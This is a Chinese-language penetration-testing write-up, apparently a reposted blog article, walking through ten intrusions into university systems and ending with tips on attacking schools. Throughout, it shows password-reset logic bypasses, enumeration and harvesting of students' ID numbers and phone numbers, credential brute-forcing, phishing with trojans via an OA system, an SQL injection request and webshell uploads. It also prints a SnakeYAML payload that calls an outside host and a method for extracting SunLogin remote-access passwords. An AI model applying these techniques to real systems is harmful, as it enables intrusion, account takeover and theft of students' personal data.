渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码

1、OA系统密码找回

找回密码

系统使用说明文档中发现登录账号 600030

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第1张图片

密码找回,找回方式选择密保问题 

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第2张图片

问题选择出生地,密保问题答案填写高校所在地 

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第3张图片

即可修改密码

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第4张图片

修改密码,即可以图文信息中心的身份登录OA系统 

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第5张图片

在文件中找到1400多名学生的敏感信息文件,其中存在手机号、身份证号、学号,可以组合密码本进行统一身份认证系统的爆破登录,默认密码为身份证后六位

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第6张图片

成功登录一部分账号

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第7张图片

登录VPN

进行内网扫描,利用MS17010拿下C段多台主机权限

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第8张图片

钓鱼 

利用OA系统的通讯功能,散播木马

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第9张图片

获取多台机器权限

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第10张图片

2、逻辑漏洞修改密码 

GitHub密码泄漏

GitHub泄漏学号密码

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第11张图片

但账号已被禁用 

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第12张图片

获取学号手机号 

存在注册功能的网站注册用户,然后登录

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第13张图片

通过以下接口获得用户ID /User/GetUserListByKeyWord 

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第14张图片

可以通过以下接口遍历用户ID,获取任意用户的姓名 手机号 邮箱等敏感信息

/User/Tip?time61&id=caec35e7-9956-4f68-98bc-e2aee73ebda5&_=1664438691592

获取多组学号、姓名、手机号

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第15张图片

修改密码

点击同意门户的忘记密码功能,输入上面得到的学号

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第16张图片

输入手机号,点击获取验证码并抓包

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第17张图片

记录回包内容

"datas":"{\"sign\":\"407ec6dc275f4766a4525e059a60ca16\"}","code":"0","message":"获取成功"

随意输入验证码,点击下一步,并把上面的流量包直接返回 

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第18张图片

可以看到页面跳转到了设置密码 

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第19张图片

成功更改密码 

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第20张图片

79个应用,通过其中一个aspx站SQL注入拿到shell 

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第21张图片

3、Github泄漏账号密码 

账号密码

1、GitHub搜索"学校域名" "password" 发现邮箱账号密码

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第22张图片

2、登录邮箱发现手机号身份证号

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第23张图片

统一门户 

3、手机号加邮箱密码直接登录统一门户

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第24张图片

泛微OA

跳转到泛微OA,文件上传GetShell

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第25张图片

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第26张图片 

4、向日葵密码读取 

heapdump文件泄漏

直接下载heapdump文件

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第27张图片

读取到mysql账号密码

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第28张图片

向日葵密码读取

成功连接mysql服务器,执行xp_cmdshell

C:\Program Files\Oray\SunLogin\SunloginClient\config.ini为向日葵的默认安装配置文件,直接尝试读取

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第29张图片

fastcode将第一位字母去除就为本机识别码,encry_pwd为加密后的本机验证码

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第30张图片

可以使用GitHub解密项目GitHub - wafinfo/Sunflower_get_Password: 一款针对向日葵的识别码和验证码提取工具进行解密。

解密后成功连接目标主机服务器

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第31张图片

5、若依漏洞GetShell

1、某学院首页

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第32张图片

2、/login ,访问后台页面,发现为若依框架,admin/admin@123直接登录后台

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第33张图片

定时任务命令执行

以管理员权限登录在定时任务处新增

org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL ["ftp://ceshi.bdtmos.dnslog.cn"] ]] ]')运行任务

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第34张图片

DNSlog平台收到请求

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第35张图片

shiro 反序列化漏洞

工具直接开扫,成功注入内存马

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第36张图片

连接内存马

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第37张图片

发现历史入侵痕迹,发现fscan黑客漏扫工具

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第38张图片

SQL注入

sql注入当时也懒得去尝试,估计也是存在的

/system/role/list

/system/role/export

/system/dept/edit

POST /system/role/list HTTP/1.1
Host: 
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=e9f143b9-3c3d-4acb-96a4-93c7367a98e9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 75

params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))

6、FCKeditor上传文件GetShell 

1、扫描目录发现存在FCKeditor目录

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第39张图片

2、直接找到上传目录

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第40张图片

3、上传aspx木马

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第41张图片

成功连接

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第42张图片

7、任意文件上传

根据学校名称及域名进行编排密码本,爆破登录admin账号

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第43张图片

上传点任意文件上传GetShell

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第44张图片

8、S2反序列化漏洞GetShell

1、目标网站存在S2框架

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第45张图片

2、直接使用工具进行扫描,进而获取权限进行内网渗透

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第46张图片

9、逻辑漏洞

找回密码

1、某站点找回密码处,短信验证码直接出现在回包中

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第47张图片

2、谷歌语法搜索 "XX大学" "手机号" filetype:xls 找到一些手机号码

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第48张图片

3、找回功能-修改密码-登录系统,发现是一个学校党务的测试系统

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第49张图片

但其中数据是真实的,有上千份姓名、手机号、学号、身份证等信息

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第50张图片

统一门户

使用学号加身份证后六位直接登录统一服务平台

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第51张图片

10、geoserver弱口令

8085端口geoserver,进入登陆页面,使用默认账号密码admin/geoserver成功登录后台。

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第52张图片

获取数据库密码

登录后进入配置页面,点击查看其中的数据存储

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第53张图片

F12查看网页源代码,读取PostgreSQL密码:

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第54张图片

撞库

同时发现目标ip还对外开启了mysql数据库,使用root和上文获取到的密码,成功连接上。

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第55张图片

在其中一个log表中发现了账号和MD5加密的密码。

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第56张图片

GetShell

8888端口后台登录页,使用数据库中获取到的账号密码成功登录后台,发现是个金碟的系统,然后使用了文件上传漏洞,成功getshell(截图和payload有点敏感,就不放了)

渗透测试 | 教育行业渗透打点,通过漏洞找回学号密码_第57张图片

总结:

对于高校的渗透可以从以下几点入手

1、VPN弱口令,GitHub泄漏是重灾区,可以搜索"学校域名" "password"

2、高校的站点一般比较老旧,aspx的站点比较多,可以多关注一下SQL注入,大多数的后台都存在SQL注入。

3、多扫下目录,有些存在各种编辑器的漏洞,但是一些漏洞可能是伪修复了,比如说ueditor的文件上传,可能只是把参数名更换了,只要找到正确的参数名就可以继续利用。

4、百度谷歌高级搜索学号文件,多收集一些账号,搜集网站的使用说明文件,其中有对密码组成进行说明,如身份证后六位等,针对一些管理员的账号进行密码的编排

5、QQ官方群有一些敏感文件,可以使用上面搜集到的信息混入其中

总结起来就是多信息收集,信息收集yyds

你可能感兴趣的:(网络安全,xss,密码学,前端,web安全,系统安全,计算机网络)